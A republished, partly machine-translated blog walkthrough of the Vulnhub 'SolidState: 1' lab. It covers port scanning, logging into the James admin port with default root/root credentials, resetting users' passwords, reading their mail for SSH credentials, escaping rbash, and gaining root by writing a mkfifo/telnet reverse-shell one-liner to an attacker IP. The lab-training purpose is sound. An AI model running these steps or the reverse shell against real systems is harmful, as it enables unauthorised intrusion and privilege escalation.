当前位置:网站首页>Vulnhub solidstate: 1 target penetration test

Vulnhub solidstate: 1 target penetration test

2022-07-24 05:38:00 Outstanding, outstanding

  • One 、ip Probe

  • Two 、 Port detection

  • Found frequent occurrence of james, also 4555 Port is still running james-admin

  • 3、 ... and 、 Port information collection

  • Check the script , Discover the use of root/root Connect 4555 port

  • Four 、 Port information utilization

  • 4.1 nc Connect 4555 port (root/root)

  • found 5 Users , And will 5 User passwords are reset to 123

  • 4.2 Log in to the account in turn , Check email (POP3)

  • Use telnet After logging in to the email , Find out john There is a letter about mindy The mail
  • Sign in mindy Check the email content in your account , Find out ssh User name and password

  • 4.3 Sign in ssh

  • After logging in, I found it was a restricted rbash, Many commands cannot be executed

  • 4.4 rbash Bypass

  • stay ssh Try to bypass when logging in

  • 4.5 Upgrade terminal

  • Terminal optimization 
  • python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo;fg
export TERM=xterm
reset

  • 4.6  View other user processes

  • adopt /etc/passwd Knowledge still exists james user , View the user process , Get into /opt Catalog , found root File of account Authority

  • 4.7  Write bounce shell

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 172.16.9.9 3333 > /tmp/f

  • 4.8  Turn on local monitoring

  • Received a rebound shell by root jurisdiction , The right raising is completed .

原网站

版权声明
本文为[Outstanding, outstanding]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/205/202207240516157432.html

边栏推荐

猜你喜欢

随机推荐